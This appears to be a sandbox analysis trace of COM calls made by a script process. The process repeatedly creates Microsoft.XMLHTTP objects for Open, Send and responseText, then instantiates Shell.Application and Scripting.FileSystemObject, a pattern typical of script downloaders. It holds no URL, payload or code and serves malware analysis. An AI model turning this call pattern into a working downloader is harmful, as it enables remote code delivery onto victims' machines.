	[0466.153] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0466.153] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0466.153] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0466.154] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0466.154] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7308) returned 0x0
	[0466.154] ??2@YAPEAX_K@Z () returned 0x62f330
	[0466.154] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7308, pUnkSite=0x62f330) 
	[0466.154] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0466.154] XMLHTTPRequest:IUnknown:Release (This=0x49c7308) returned 0x0
	[0466.154] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0466.154] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0466.154] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0466.154] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0466.154] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0466.154] longjmp () 
	[0466.154] longjmp () 
	[0466.155] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0466.155] SysStringLen (param_1=0x0) returned 0x0
	[0466.155] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0466.155] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0466.155] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0466.155] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0466.155] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0466.155] ??2@YAPEAX_K@Z () returned 0x62f310
	[0466.155] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0466.155] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0466.155] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0466.155] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0466.155] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0466.155] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0466.155] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0466.156] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0466.156] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0466.156] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0466.156] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0466.821] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0466.822] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0466.822] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0466.822] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0466.822] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0466.822] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0466.822] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0466.822] SysStringLen (param_1=0x0) returned 0x0
	[0466.822] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0466.822] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0466.822] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0466.823] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0466.823] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0466.823] ??2@YAPEAX_K@Z () returned 0x62f350
	[0466.823] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0466.823] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0466.823] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0466.823] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0466.823] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0466.823] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0466.823] SysStringLen (param_1=0x0) returned 0x0
	[0466.823] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0466.827] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0466.827] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0466.827] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0466.827] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0466.827] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0466.827] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0467.732] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0467.732] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0467.732] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0467.733] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0467.733] SysStringLen (param_1=0x0) returned 0x0
	[0467.733] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0467.733] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0467.733] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0467.734] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0467.734] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0467.734] ??2@YAPEAX_K@Z () returned 0x62f310
	[0467.734] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0467.734] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0467.734] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0467.734] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0467.734] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0467.734] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0467.734] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0467.736] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0467.736] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0467.736] SysStringLen (param_1=0x0) returned 0x0
	[0467.736] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0467.736] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0467.736] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0467.737] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0467.737] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0467.737] ??2@YAPEAX_K@Z () returned 0x62f330
	[0467.737] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0467.737] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0467.737] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0467.737] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0467.737] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0467.737] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0467.737] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0467.737] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0467.737] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0467.737] SysStringLen (param_1=0x0) returned 0x0
